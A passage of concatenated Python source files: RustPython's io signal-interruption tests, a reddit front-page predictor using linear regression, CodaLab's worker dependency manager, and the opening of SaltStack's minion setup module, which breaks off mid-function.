fdopen_kwargs["closefd"] = False
large_data = item * (support.PIPE_MAX_SIZE // len(item) + 1)
try:
wio = self.io.open(w, **fdopen_kwargs)
if hasattr(signal, 'pthread_sigmask'):
# create the thread with SIGALRM signal blocked
signal.pthread_sigmask(signal.SIG_BLOCK, [signal.SIGALRM])
t.start()
signal.pthread_sigmask(signal.SIG_UNBLOCK, [signal.SIGALRM])
else:
t.start()
# Fill the pipe enough that the write will be blocking.
# It will be interrupted by the timer armed above. Since the
# other thread has read one byte, the low-level write will
# return with a successful (partial) result rather than an EINTR.
# The buffered IO layer must check for pending signal
# handlers, which in this case will invoke alarm_interrupt().
signal.alarm(1)
try:
self.assertRaises(ZeroDivisionError, wio.write, large_data)
finally:
signal.alarm(0)
t.join()
# We got one byte, get another one and check that it isn't a
# repeat of the first one.
read_results.append(os.read(r, 1))
self.assertEqual(read_results, [bytes[0:1], bytes[1:2]])
finally:
os.close(w)
os.close(r)
# This is deliberate. If we didn't close the file descriptor
# before closing wio, wio would try to flush its internal
# buffer, and block again.
try:
wio.close()
except OSError as e:
if e.errno != errno.EBADF:
raise
def test_interrupted_write_unbuffered(self):
self.check_interrupted_write(b"xy", b"xy", mode="wb", buffering=0)
def test_interrupted_write_buffered(self):
self.check_interrupted_write(b"xy", b"xy", mode="wb")
def test_interrupted_write_text(self):
self.check_interrupted_write("xy", b"xy", mode="w", encoding="ascii")
@support.no_tracing
def check_reentrant_write(self, data, **fdopen_kwargs):
def on_alarm(*args):
# Will be called reentrantly from the same thread
wio.write(data)
1/0
signal.signal(signal.SIGALRM, on_alarm)
r, w = os.pipe()
wio = self.io.open(w, **fdopen_kwargs)
try:
signal.alarm(1)
# Either the reentrant call to wio.write() fails with RuntimeError,
# or the signal handler raises ZeroDivisionError.
with self.assertRaises((ZeroDivisionError, RuntimeError)) as cm:
while 1:
for i in range(100):
wio.write(data)
wio.flush()
# Make sure the buffer doesn't fill up and block further writes
os.read(r, len(data) * 100)
exc = cm.exception
if isinstance(exc, RuntimeError):
self.assertTrue(str(exc).startswith("reentrant call"), str(exc))
finally:
signal.alarm(0)
wio.close()
os.close(r)
def test_reentrant_write_buffered(self):
self.check_reentrant_write(b"xy", mode="wb")
def test_reentrant_write_text(self):
self.check_reentrant_write("xy", mode="w", encoding="ascii")
def check_interrupted_read_retry(self, decode, **fdopen_kwargs):
"""Check that a buffered read, when it gets interrupted (either
returning a partial result or EINTR), properly invokes the signal
handler and retries if the latter returned successfully."""
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
def alarm_handler(sig, frame):
os.write(w, b"bar")
signal.signal(signal.SIGALRM, alarm_handler)
try:
rio = self.io.open(r, **fdopen_kwargs)
os.write(w, b"foo")
signal.alarm(1)
# Expected behaviour:
# - first raw read() returns partial b"foo"
# - second raw read() returns EINTR
# - third raw read() returns b"bar"
self.assertEqual(decode(rio.read(6)), "foobar")
finally:
signal.alarm(0)
rio.close()
os.close(w)
os.close(r)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_interrupted_read_retry_buffered(self):
self.check_interrupted_read_retry(lambda x: x.decode('latin1'),
mode="rb")
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_interrupted_read_retry_text(self):
self.check_interrupted_read_retry(lambda x: x,
mode="r")
def check_interrupted_write_retry(self, item, **fdopen_kwargs):
"""Check that a buffered write, when it gets interrupted (either
returning a partial result or EINTR), properly invokes the signal
handler and retries if the latter returned successfully."""
select = support.import_module("select")
# A quantity that exceeds the buffer size of an anonymous pipe's
# write end.
N = support.PIPE_MAX_SIZE
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
# We need a separate thread to read from the pipe and allow the
# write() to finish. This thread is started after the SIGALRM is
# received (forcing a first EINTR in write()).
read_results = []
write_finished = False
error = None
def _read():
try:
while not write_finished:
while r in select.select([r], [], [], 1.0)[0]:
s = os.read(r, 1024)
read_results.append(s)
except BaseException as exc:
nonlocal error
error = exc
t = threading.Thread(target=_read)
t.daemon = True
def alarm1(sig, frame):
signal.signal(signal.SIGALRM, alarm2)
signal.alarm(1)
def alarm2(sig, frame):
t.start()
large_data = item * N
signal.signal(signal.SIGALRM, alarm1)
try:
wio = self.io.open(w, **fdopen_kwargs)
signal.alarm(1)
# Expected behaviour:
# - first raw write() is partial (because of the limited pipe buffer
# and the first alarm)
# - second raw write() returns EINTR (because of the second alarm)
# - subsequent write()s are successful (either partial or complete)
written = wio.write(large_data)
self.assertEqual(N, written)
wio.flush()
write_finished = True
t.join()
self.assertIsNone(error)
self.assertEqual(N, sum(len(x) for x in read_results))
finally:
signal.alarm(0)
write_finished = True
os.close(w)
os.close(r)
# This is deliberate. If we didn't close the file descriptor
# before closing wio, wio would try to flush its internal
# buffer, and could block (in case of failure).
try:
wio.close()
except OSError as e:
if e.errno != errno.EBADF:
raise
@unittest.skip("TODO: RUSTPYTHON, thread 'main' panicked at 'already borrowed: BorrowMutError'")
def test_interrupted_write_retry_buffered(self):
self.check_interrupted_write_retry(b"x", mode="wb")
@unittest.skip("TODO: RUSTPYTHON, thread 'main' panicked at 'already borrowed: BorrowMutError'")
def test_interrupted_write_retry_text(self):
self.check_interrupted_write_retry("x", mode="w", encoding="latin1")
class CSignalsTest(SignalsTest):
io = io
class PySignalsTest(SignalsTest):
io = pyio
# Handling reentrancy issues would slow down _pyio even more, so the
# tests are disabled.
test_reentrant_write_buffered = None
test_reentrant_write_text = None
def load_tests(*args):
tests = (CIOTest, PyIOTest, APIMismatchTest,
CBufferedReaderTest, PyBufferedReaderTest,
CBufferedWriterTest, PyBufferedWriterTest,
CBufferedRWPairTest, PyBufferedRWPairTest,
CBufferedRandomTest, PyBufferedRandomTest,
StatefulIncrementalDecoderTest,
CIncrementalNewlineDecoderTest, PyIncrementalNewlineDecoderTest,
CTextIOWrapperTest, PyTextIOWrapperTest,
CMiscIOTest, PyMiscIOTest,
CSignalsTest, PySignalsTest,
)
# Put the namespaces of the IO module we are testing and some useful mock
# classes in the __dict__ of each test.
mocks = (MockRawIO, MisbehavedRawIO, MockFileIO, CloseFailureIO,
MockNonBlockWriterIO, MockUnseekableIO, MockRawIOWithoutRead,
SlowFlushRawIO)
all_members = io.__all__  # + ["IncrementalNewlineDecoder"] XXX RUSTPYTHON
c_io_ns = {name : getattr(io, name) for name in all_members}
py_io_ns = {name : getattr(pyio, name) for name in all_members}
globs = globals()
c_io_ns.update((x.__name__, globs["C" + x.__name__]) for x in mocks)
py_io_ns.update((x.__name__, globs["Py" + x.__name__]) for x in mocks)
# Avoid turning open into a bound method.
py_io_ns["open"] = pyio.OpenWrapper
for test in tests:
if test.__name__.startswith("C"):
for name, obj in c_io_ns.items():
setattr(test, name, obj)
elif test.__name__.startswith("Py"):
for name, obj in py_io_ns.items():
setattr(test, name, obj)
suite = unittest.TestSuite([unittest.makeSuite(test) for test in tests])
return suite
if __name__ == "__main__":
unittest.main()
|
predictor.py
|
from sklearn.linear_model import LinearRegression
from .score_filter import ScoreFilter
import time
from threading import Thread
from collections import defaultdict
class Predictor:
def __init__(self, db_collection):
self.collection = db_collection
self.score_filter = ScoreFilter(10000)
self.sub_weight = defaultdict(lambda: [0,1])
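# sub_weight maps subreddit -> [front_page_count, total_count]; the ratio
# front_page_count / total_count is later used as the per-entry 'weight' feature.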
self.reset()
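# gen_new_clf fits a fresh LinearRegression on entries recorded more than ten
# hours ago, using 'top_position' as the target and the remaining numeric
# fields (plus the per-subreddit weight) as features; malformed entries are
# removed from the collection along the way.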
def gen_new_clf(self):
new_clf = LinearRegression()
data = self.collection.find({'time' : {'$lt': time.time() - (60 * 60 * 10)}})
seed_data = []
seed_results = []
for entry in data:
valid = True
for v in entry.values():
if v.__class__.__name__ == 'dict':
self.collection.remove({'id': entry['id']})
valid = False
break
if(valid):
top_pos = [entry['top_position']]
entry_id = entry['id']
entry['weight'] = self.sub_weight[entry['subreddit']][0] / self.sub_weight[entry['subreddit']][1]
entry.__delitem__('top_position')
entry.__delitem__('_id')
entry.__delitem__('id')
entry.__delitem__('subreddit')
entry.__delitem__('name_hash')
for v in entry.values():
if(v.__class__.__name__ != 'int' and v.__class__.__name__ != 'long' and v.__class__.__name__ != 'float'):
print('removing entry')
print(entry.values())
print(entry_id)
self.collection.remove({'id': entry_id})
valid = False
break
if(valid):
seed_results += [top_pos]
seed_data += [self.get_ordered_values(entry)]
new_clf.fit(seed_data, seed_results)
return new_clf
def training_filter(self, entry):
return True
def reset_sub_weight(self):
new_weight = defaultdict(lambda: [0,1])
data = self.collection.find({'time' : {'$lt': time.time() - (60 * 60 * 10)}})
for entry in data:
valid = True
for v in entry.values():
if v.__class__.__name__ == 'dict':
self.collection.remove({'id': entry['id']})
valid = False
break
if(valid):
if(entry['top_position'] < 100):
new_weight[entry['subreddit']][0]+=1
new_weight[entry['subreddit']][1]+=1
self.sub_weight = new_weight
def reset(self):
print("Resetting Predictor")
self.reset_sub_weight()
self.clf = self.gen_new_clf()
print("Reset Complete")
def async_reset(self):
reset_thread = Thread(target=self.reset, args=())
reset_thread.start()
def predict(self, entry_id):
entry = self.collection.find_one({'id': entry_id})
if entry is None:
raise NameError('Entry with that ID could not be found.')
y_value = [entry['top_position']]
name = entry['id']
entry['weight'] = self.sub_weight[entry['subreddit']][0] / self.sub_weight[entry['subreddit']][1]
values = list(entry.values())
weight_str = "{0} / {1}".format(self.sub_weight[entry['subreddit']][0], self.sub_weight[entry['subreddit']][1])
entry.__delitem__('top_position')
entry.__delitem__('_id')
entry.__delitem__('id')
entry.__delitem__('subreddit')
entry.__delitem__('name_hash')
prediction = self.clf.predict([self.get_ordered_values(entry)])[0]
weight = self.score_filter.insert(name, prediction)
if(weight == 0):
print('============NEW LEADER============')
print(values)
print("{0}, {1}".format(prediction, weight))
print(weight_str)
print('==================================')
elif(weight < 0.001):
print('=========NEW Probably FP==========')
print(values)
print("{0}, {1}".format(prediction, weight))
print(weight_str)
print('==================================')
elif(weight < 0.50):
print(values)
print("{0}, {1}".format(prediction, weight))
print(weight_str)
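# Accept the entry only once the score filter has filled up and the entry's
# percentile weight falls below the observed fraction of entries that ever
# reached the top 100 positions.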
return self.score_filter.is_full() and (weight < (self.collection.find({ 'top_position': { '$lt': 101 }}).count() / self.collection.find().count()))
def get_ordered_values(self, entry):
keys = list(entry.keys())
keys.sort()
values = []
for k in keys:
values+=[entry[k]]
return values
|
dependency_manager.py
|
from contextlib import closing
from collections import namedtuple
import logging
import os
import threading
import traceback
import time
import shutil
from codalab.lib.formatting import size_str
from codalab.worker.file_util import remove_path, un_tar_directory
from codalab.worker.fsm import BaseDependencyManager, DependencyStage, StateTransitioner
import codalab.worker.pyjson
from codalab.worker.worker_thread import ThreadDict
from codalab.worker.state_committer import JsonStateCommitter
from codalab.worker.bundle_state import DependencyKey
logger = logging.getLogger(__name__)
DependencyState = namedtuple(
'DependencyState', 'stage dependency_key path size_bytes dependents last_used message killed'
)
class DownloadAbortedException(Exception):
"""
Exception raised by the download if a download is killed before it is complete
"""
def __init__(self, message):
super(DownloadAbortedException, self).__init__(message)
class DependencyManager(StateTransitioner, BaseDependencyManager):
"""
This dependency manager downloads dependency bundles from Codalab server
to the local filesystem. It caches all downloaded dependencies but cleans up the
old ones if the disk usage hits the given threshold.
For this class dependencies are uniquely identified by DependencyKey
"""
DEPENDENCIES_DIR_NAME = 'dependencies'
DEPENDENCY_FAILURE_COOLDOWN = 10
# TODO(bkgoksel): The server writes these to the worker_dependencies table, which stores the dependencies
# json as a SqlAlchemy LargeBinary, which defaults to MySQL BLOB, which has a size limit of
# 65K. For now we limit this value to about 58K to avoid any issues but we probably want to do
# something better (either specify MEDIUMBLOB in the SqlAlchemy definition of the table or change
# the data format of how we store this)
MAX_SERIALIZED_LEN = 60000
def __init__(self, commit_file, bundle_service, worker_dir, max_cache_size_bytes):
super(DependencyManager, self).__init__()
self.add_transition(DependencyStage.DOWNLOADING, self._transition_from_DOWNLOADING)
self.add_terminal(DependencyStage.READY)
self.add_terminal(DependencyStage.FAILED)
self._state_committer = JsonStateCommitter(commit_file)
self._bundle_service = bundle_service
self._max_cache_size_bytes = max_cache_size_bytes
self.dependencies_dir = os.path.join(worker_dir, DependencyManager.DEPENDENCIES_DIR_NAME)
if not os.path.exists(self.dependencies_dir):
logger.info('{} doesn\'t exist, creating.'.format(self.dependencies_dir))
os.makedirs(self.dependencies_dir, 0o770)
# Locks for concurrency
self._dependency_locks = dict() # type: Dict[DependencyKey, threading.RLock]
self._global_lock = threading.RLock() # Used for add/remove actions
self._paths_lock = threading.RLock() # Used for path name computations
# File paths that are currently being used to store dependencies. Used to prevent conflicts
self._paths = set()
# DependencyKey -> DependencyState
self._dependencies = dict()
# DependencyKey -> WorkerThread(thread, success, failure_message)
self._downloading = ThreadDict(fields={'success': False, 'failure_message': None})
self._load_state()
# Sync states between dependency-state.json and dependency directories on the local file system.
self._sync_state()
self._stop = False
self._main_thread = None
def _save_state(self):
with self._global_lock, self._paths_lock:
self._state_committer.commit({'dependencies': self._dependencies, 'paths': self._paths})
def _load_state(self):
"""
Load state from dependencies-state.json, which contains information about bundles (e.g., stage, dependents,
last used, etc.), and populate self._dependencies, self._dependency_locks, and self._paths
"""
state = self._state_committer.load(default={'dependencies': {}, 'paths': set()})
dependencies = {}
dependency_locks = {}
for dep, dep_state in state['dependencies'].items():
dependencies[dep] = dep_state
dependency_locks[dep] = threading.RLock()
with self._global_lock, self._paths_lock:
self._dependencies = dependencies
self._dependency_locks = dependency_locks
self._paths = state['paths']
logger.info(
'Loaded {} dependencies, {} paths from cache.'.format(
len(self._dependencies), len(self._paths)
)
)
def _sync_state(self):
"""
Synchronize dependency states between dependencies-state.json and the local file system as follows:
1. self._dependencies, self._dependency_locks, and self._paths: populated from dependencies-state.json
in function _load_state()
2. directories on the local file system: the bundle contents
This function forces 1 and 2 to be in sync by taking their intersection (e.g., deleting bundles from the
local file system that don't appear in dependencies-state.json, and vice versa)
"""
# Get the paths that exist in dependency state, loaded path and
# the local file system (the dependency directories under self.dependencies_dir)
local_directories = set(os.listdir(self.dependencies_dir))
paths_in_loaded_state = [dep_state.path for dep_state in self._dependencies.values()]
self._paths = self._paths.intersection(paths_in_loaded_state).intersection(
local_directories
)
# Remove the orphaned dependencies from self._dependencies and
# self._dependency_locks if they don't exist in self._paths (intersection of paths in dependency state,
# loaded paths and the paths on the local file system)
dependencies_to_remove = [
dep
for dep, dep_state in self._dependencies.items()
if dep_state.path not in self._paths
]
for dep in dependencies_to_remove:
logger.info(
"Dependency {} in dependency state but its path {} doesn't exist on the local file system. "
"Removing it from dependency state.".format(
dep, os.path.join(self.dependencies_dir, self._dependencies[dep].path)
)
)
del self._dependencies[dep]
del self._dependency_locks[dep]
# Remove the orphaned directories from the local file system
directories_to_remove = local_directories - self._paths
for dir in directories_to_remove:
full_path = os.path.join(self.dependencies_dir, dir)
logger.info(
"Remove orphaned directory {} from the local file system.".format(full_path)
)
remove_path(full_path)
# Save the current synced state back to the state file: dependency-state.json as
# the current state might have been changed during the state syncing phase
self._save_state()
def start(self):
logger.info('Starting local dependency manager')
def loop(self):
while not self._stop:
try:
self._process_dependencies()
self._save_state()
self._cleanup()
self._save_state()
except Exception:
traceback.print_exc()
time.sleep(1)
self._main_thread = threading.Thread(target=loop, args=[self])
self._main_thread.start()
def stop(self):
logger.info('Stopping local dependency manager')
self._stop = True
self._downloading.stop()
self._main_thread.join()
logger.info('Stopped local dependency manager')
def _process_dependencies(self):
for dep_key, dep_state in self._dependencies.items():
with self._dependency_locks[dep_key]:
self._dependencies[dep_key] = self.transition(dep_state)
def _prune_failed_dependencies(self):
"""
Prune failed dependencies older than DEPENDENCY_FAILURE_COOLDOWN seconds so that further runs
get to retry the download. Without pruning, any future run depending on a
failed dependency would automatically fail indefinitely.
"""
with self._global_lock:
self._acquire_all_locks()
failed_deps = {
dep_key: dep_state
for dep_key, dep_state in self._dependencies.items()
if dep_state.stage == DependencyStage.FAILED
and time.time() - dep_state.last_used
> DependencyManager.DEPENDENCY_FAILURE_COOLDOWN
}
for dep_key, dep_state in failed_deps.items():
self._delete_dependency(dep_key)
self._release_all_locks()
def _cleanup(self):
"""
Prune failed dependencies older than DEPENDENCY_FAILURE_COOLDOWN seconds.
Limit the disk usage of the dependencies (both the bundle files and the serialized state file size)
Deletes oldest failed dependencies first and then oldest finished dependencies.
Doesn't touch downloading dependencies.
"""
self._prune_failed_dependencies()
# Hold all the locks (this should be fast if no cleanup is needed; otherwise it makes sure nothing is corrupted).
while True:
with self._global_lock:
self._acquire_all_locks()
bytes_used = sum(dep_state.size_bytes for dep_state in self._dependencies.values())
serialized_length = len(codalab.worker.pyjson.dumps(self._dependencies))
if (
bytes_used > self._max_cache_size_bytes
or serialized_length > DependencyManager.MAX_SERIALIZED_LEN
):
logger.debug(
'%d dependencies in cache, disk usage: %s (max %s), serialized size: %s (max %s)',
len(self._dependencies),
size_str(bytes_used),
size_str(self._max_cache_size_bytes),
size_str(serialized_length),
DependencyManager.MAX_SERIALIZED_LEN,
)
ready_deps = {
dep_key: dep_state
for dep_key, dep_state in self._dependencies.items()
if dep_state.stage == DependencyStage.READY and not dep_state.dependents
}
failed_deps = {
dep_key: dep_state
for dep_key, dep_state in self._dependencies.items()
if dep_state.stage == DependencyStage.FAILED
}
if failed_deps:
dep_key_to_remove = min(
failed_deps.items(), key=lambda dep: dep[1].last_used
)[0]
elif ready_deps:
dep_key_to_remove = min(
ready_deps.items(), key=lambda dep: dep[1].last_used
)[0]
else:
logger.info(
'Dependency quota full but there are only downloading dependencies, not cleaning up until downloads are over'
)
self._release_all_locks()
break
if dep_key_to_remove:
self._delete_dependency(dep_key_to_remove)
self._release_all_locks()
else:
self._release_all_locks()
break
def _delete_dependency(self, dependency_key):
"""
Remove the given dependency from the manager's state
Also delete any known files on the filesystem if any exist
"""
if self._acquire_if_exists(dependency_key):
try:
path_to_remove = self._dependencies[dependency_key].path
self._paths.remove(path_to_remove)
remove_path(path_to_remove)
except Exception:
pass
finally:
del self._dependencies[dependency_key]
self._dependency_locks[dependency_key].release()
def has(self, dependency_key):
"""
Takes a DependencyKey
Returns true if the manager has processed this dependency
"""
with self._global_lock:
return dependency_key in self._dependencies
def get(self, uuid, dependency_key):
"""
Request the dependency for the run with uuid, registering uuid as a dependent of this dependency
"""
now = time.time()
if not self._acquire_if_exists(dependency_key): # add dependency state if it does not exist
with self._global_lock:
self._dependency_locks[dependency_key] = threading.RLock()
self._dependency_locks[dependency_key].acquire()
self._dependencies[dependency_key] = DependencyState(
stage=DependencyStage.DOWNLOADING,
dependency_key=dependency_key,
path=self._assign_path(dependency_key),
size_bytes=0,
dependents=set([uuid]),
last_used=now,
message="Starting download",
killed=False,
)
# update last_used as long as it isn't in FAILED
if self._dependencies[dependency_key].stage != DependencyStage.FAILED:
self._dependencies[dependency_key].dependents.add(uuid)
self._dependencies[dependency_key] = self._dependencies[dependency_key]._replace(
last_used=now
)
self._dependency_locks[dependency_key].release()
return self._dependencies[dependency_key]
def release(self, uuid, dependency_key):
"""
Register that the run with uuid is no longer dependent on this dependency
If no more runs are dependent on this dependency, kill it
"""
if self._acquire_if_exists(dependency_key):
dep_state = self._dependencies[dependency_key]
if uuid in dep_state.dependents:
dep_state.dependents.remove(uuid)
if not dep_state.dependents:
dep_state = dep_state._replace(killed=True)
self._dependencies[dependency_key] = dep_state
self._dependency_locks[dependency_key].release()
def _acquire_if_exists(self, dependency_key):
"""
Safely acquires a lock for the given dependency if it exists
Returns True if the dependency exists, False otherwise
Callers should remember to release the lock
"""
with self._global_lock:
if dependency_key in self._dependencies:
self._dependency_locks[dependency_key].acquire()
return True
else:
return False
def _acquire_all_locks(self):
"""
Acquires all dependency locks in the thread it's called from
"""
with self._global_lock:
for dependency, lock in self._dependency_locks.items():
lock.acquire()
def _release_all_locks(self):
"""
Releases all dependency locks in the thread it's called from
"""
with self._global_lock:
for dependency, lock in self._dependency_locks.items():
lock.release()
def _assign_path(self, dependency_key):
"""
Normalize the path for the dependency by replacing / with _, avoiding conflicts
"""
# TODO(Ashwin): make this not fs-specific.
if dependency_key.parent_path:
path = os.path.join(dependency_key.parent_uuid, dependency_key.parent_path)
else:
path = dependency_key.parent_uuid
path = path.replace(os.path.sep, '_')
# You could have a conflict between, for example a/b_c and
# a_b/c. We have to avoid those.
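# Illustration (hypothetical keys): ('a', 'b_c') and ('a_b', 'c') both
# normalize to 'a_b_c'; the loop below turns whichever comes second into
# 'a_b_c_'.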
with self._paths_lock:
while path in self._paths:
path = path + '_'
self._paths.add(path)
return path
def _store_dependency(self, dependency_path, fileobj, target_type):
"""
Copy the dependency fileobj to its path on the local filesystem
Overwrite existing files by the same name if found
(may happen if filesystem modified outside the dependency manager,
for example during an update if the state gets reset but filesystem
doesn't get cleared)
"""
try:
if os.path.exists(dependency_path):
logger.info('Path %s already exists, overwriting', dependency_path)
if os.path.isdir(dependency_path):
shutil.rmtree(dependency_path)
else:
os.remove(dependency_path)
if target_type == 'directory':
un_tar_directory(fileobj, dependency_path, 'gz')
else:
with open(dependency_path, 'wb') as f:
logger.debug('copying file to %s', dependency_path)
shutil.copyfileobj(fileobj, f)
except Exception:
raise
@property
def all_dependencies(self):
with self._global_lock:
return list(self._dependencies.keys())
def _transition_from_DOWNLOADING(self, dependency_state):
def download():
def update_state_and_check_killed(bytes_downloaded):
"""
Callback method for bundle service client updates dependency state and
raises DownloadAbortedException if download is killed by dep. manager
"""
with self._dependency_locks[dependency_state.dependency_key]:
state = self._dependencies[dependency_state.dependency_key]
if state.killed:
raise DownloadAbortedException("Aborted by user")
self._dependencies[dependency_state.dependency_key] = state._replace(
size_bytes=bytes_downloaded,
message="Downloading dependency: %s downloaded"
% size_str(bytes_downloaded),
)
# TODO(Ashwin): make this not fs-specific.
dependency_path = os.path.join(self.dependencies_dir, dependency_state.path)
logger.debug('Downloading dependency %s', dependency_state.dependency_key)
try:
# Start async download to the fileobj
fileobj, target_type = self._bundle_service.get_bundle_contents(
dependency_state.dependency_key.parent_uuid,
dependency_state.dependency_key.parent_path,
)
with closing(fileobj):
# "Bug" the fileobj's read function so that we can keep
# track of the number of bytes downloaded so far.
old_read_method = fileobj.read
bytes_downloaded = [0]
def interruptable_read(*args, **kwargs):
data = old_read_method(*args, **kwargs)
bytes_downloaded[0] += len(data)
update_state_and_check_killed(bytes_downloaded[0])
return data
fileobj.read = interruptable_read
# Start copying the fileobj to filesystem dependency path
self._store_dependency(dependency_path, fileobj, target_type)
logger.debug(
'Finished downloading %s dependency %s to %s',
target_type,
dependency_state.dependency_key,
dependency_path,
)
with self._dependency_locks[dependency_state.dependency_key]:
self._downloading[dependency_state.dependency_key]['success'] = True
except Exception as e:
with self._dependency_locks[dependency_state.dependency_key]:
self._downloading[dependency_state.dependency_key]['success'] = False
self._downloading[dependency_state.dependency_key][
'failure_message'
] = "Dependency download failed: %s " % str(e)
self._downloading.add_if_new(
dependency_state.dependency_key, threading.Thread(target=download, args=[])
)
if self._downloading[dependency_state.dependency_key].is_alive():
return dependency_state
success = self._downloading[dependency_state.dependency_key]['success']
failure_message = self._downloading[dependency_state.dependency_key]['failure_message']
self._downloading.remove(dependency_state.dependency_key)
if success:
return dependency_state._replace(
stage=DependencyStage.READY, message="Download complete"
)
else:
with self._paths_lock:
self._paths.remove(dependency_state.path)
return dependency_state._replace(stage=DependencyStage.FAILED, message=failure_message)
|
minion.py
|
# -*- coding: utf-8 -*-
'''
Routines to set up a minion
'''
# Import python libs
from __future__ import absolute_import, print_function
import os
import re
import sys
import copy
import time
import types
import signal
import fnmatch
import logging
import threading
import traceback
import multiprocessing
from random import shuffle
from stat import S_IMODE
# Import Salt Libs
# pylint: disable=import-error,no-name-in-module,redefined-builtin
import salt.ext.six as six
from salt.ext.six.moves import range
from salt.utils import reinit_crypto
# pylint: enable=no-name-in-module,redefined-builtin
# Import third party libs
try:
import zmq
# TODO: cleanup
import zmq.eventloop.ioloop
# support pyzmq 13.0.x, TODO: remove once we force people to 14.0.x
if not hasattr(zmq.eventloop.ioloop, 'ZMQIOLoop'):
zmq.eventloop.ioloop.ZMQIOLoop = zmq.eventloop.ioloop.IOLoop
HAS_ZMQ = True
except ImportError:
# Running in local, zmq not needed
HAS_ZMQ = False
HAS_RANGE = False
try:
import seco.range
HAS_RANGE = True
except ImportError:
pass
HAS_PSUTIL = False
try:
import salt.utils.psutil_compat as psutil
HAS_PSUTIL = True
except ImportError:
pass
HAS_RESOURCE = False
try:
import resource
HAS_RESOURCE = True
except ImportError:
pass
try:
import zmq.utils.monitor
HAS_ZMQ_MONITOR = True
except ImportError:
HAS_ZMQ_MONITOR = False
# pylint: enable=import-error
# Import salt libs
import salt
import salt.client
import salt.crypt
import salt.loader
import salt.beacons
import salt.payload
import salt.syspaths
import salt.utils
import salt.utils.jid
import salt.pillar
import salt.utils.args
import salt.utils.event
import salt.utils.minions
import salt.utils.schedule
import salt.utils.error
import salt.utils.zeromq
import salt.defaults.exitcodes
from salt.defaults import DEFAULT_TARGET_DELIM
from salt.utils.debug import enable_sigusr1_handler
from salt.utils.event import tagify
from salt.exceptions import (
CommandExecutionError,
CommandNotFoundError,
SaltInvocationError,
SaltReqTimeoutError,
SaltClientError,
SaltSystemExit
)
import tornado.gen # pylint: disable=F0401
import tornado.ioloop # pylint: disable=F0401
log = logging.getLogger(__name__)
# To set up a minion:
# 1. Read in the configuration
# 2. Generate the function mapping dict
# 3. Authenticate with the master
# 4. Store the AES key
# 5. Connect to the publisher
# 6. Handle publications
def resolve_dns(opts):
'''
Resolves the master_ip and master_uri options
'''
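# Rough shape of the result (addresses below are hypothetical):
#   resolve_dns({'master': 'salt.example.com', 'master_port': 4506, ...})
#   -> {'master_ip': '203.0.113.10', 'master_uri': 'tcp://203.0.113.10:4506'}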
ret = {}
check_dns = True
if (opts.get('file_client', 'remote') == 'local' and
not opts.get('use_master_when_local', False)):
check_dns = False
if check_dns is True:
# Because I import salt.log below I need to re-import salt.utils here
import salt.utils
try:
if opts['master'] == '':
raise SaltSystemExit
ret['master_ip'] = \
salt.utils.dns_check(opts['master'], True, opts['ipv6'])
except SaltClientError:
if opts['retry_dns']:
while True:
import salt.log
msg = ('Master hostname: \'{0}\' not found. Retrying in {1} '
'seconds').format(opts['master'], opts['retry_dns'])
if salt.log.is_console_configured():
log.error(msg)
else:
print('WARNING: {0}'.format(msg))
time.sleep(opts['retry_dns'])
try:
ret['master_ip'] = salt.utils.dns_check(
opts['master'], True, opts['ipv6']
)
break
except SaltClientError:
pass
else:
ret['master_ip'] = '127.0.0.1'
except SaltSystemExit:
unknown_str = 'unknown address'
master = opts.get('master', unknown_str)
if master == '':
master = unknown_str
if opts.get('__role') == 'syndic':
err = 'Master address: \'{0}\' could not be resolved. Invalid or unresolvable address. Set \'syndic_master\' value in minion config.'.format(master)
else:
err = 'Master address: \'{0}\' could not be resolved. Invalid or unresolvable address. Set \'master\' value in minion config.'.format(master)
log.error(err)
raise SaltSystemExit(code=42, msg=err)
else:
ret['master_ip'] = '127.0.0.1'
if 'master_ip' in ret and 'master_ip' in opts:
if ret['master_ip'] != opts['master_ip']:
log.warning('Master ip address changed from {0} to {1}'.format(opts['master_ip'],
ret['master_ip'])
)
ret['master_uri'] = 'tcp://{ip}:{port}'.format(ip=ret['master_ip'],
port=opts['master_port'])
return ret
def get_proc_dir(cachedir, **kwargs):
'''
Given the cache directory, return the directory that process data is
stored in, creating it if it doesn't exist.
The following optional Keyword Arguments are handled:
mode: which is anything os.makedirs would accept as mode.
uid: the uid to set, if not set, or it is None or -1 no changes are
made. Same applies if the directory is already owned by this
uid. Must be int. Works only on unix/unix like systems.
gid: the gid to set, if not set, or it is None or -1 no changes are
made. Same applies if the directory is already owned by this
gid. Must be int. Works only on unix/unix like systems.
'''
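# Illustrative call (values are hypothetical): ensure <cachedir>/proc exists
# with mode 0o700 and is owned by uid 1000.
#   proc_dir = get_proc_dir('/var/cache/salt/minion', mode=0o700, uid=1000)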
fn_ = os.path.join(cachedir, 'proc')
mode = kwargs.pop('mode', None)
if mode is None:
mode = {}
else:
mode = {'mode': mode}
if not os.path.isdir(fn_):
# proc_dir is not present, create it with mode settings
os.makedirs(fn_, **mode)
d_stat = os.stat(fn_)
# if mode is not an empty dict then we have an explicit
# dir mode. So lets check if mode needs to be changed.
if mode:
mode_part = S_IMODE(d_stat.st_mode)
if mode_part != mode['mode']:
os.chmod(fn_, (d_stat.st_mode ^ mode_part) | mode['mode'])
if hasattr(os, 'chown'):
# only on unix/unix like systems
uid = kwargs.pop('uid', -1)
gid = kwargs.pop('gid', -1)
# if uid and gid are both -1 then go ahead with
# no changes at all
if (d_stat.st_uid != uid or d_stat.st_gid != gid) and \
[i for i in (uid, gid) if i != -1]:
os.chown(fn_, uid, gid)
return fn_
def parse_args_and_kwargs(func, args, data=None):
'''
Wrap load_args_and_kwargs
'''
salt.utils.warn_until(
'Boron',
'salt.minion.parse_args_and_kwargs() has been renamed to '
'salt.minion.load_args_and_kwargs(). Please change this function call '
'before the Boron release of Salt.'
)
return load_args_and_kwargs(func, args, data=data)
def load_args_and_kwargs(func, args, data=None):
'''
Detect the args and kwargs that need to be passed to a function call, and
check them against what was passed.
'''
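# Hedged example (hypothetical function): for def f(a, b=1), the call
#   load_args_and_kwargs(f, ['foo', {'__kwarg__': True, 'b': 2}])
# would return (['foo'], {'b': 2}); plain string args are additionally run
# through salt.utils.args.parse_input() to detect key=value style kwargs.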
argspec = salt.utils.args.get_function_argspec(func)
_args = []
_kwargs = {}
invalid_kwargs = []
for arg in args:
if isinstance(arg, six.string_types):
string_arg, string_kwarg = salt.utils.args.parse_input([arg], condition=False) # pylint: disable=W0632
if string_arg:
# Don't append the version that was just derived from parse_cli
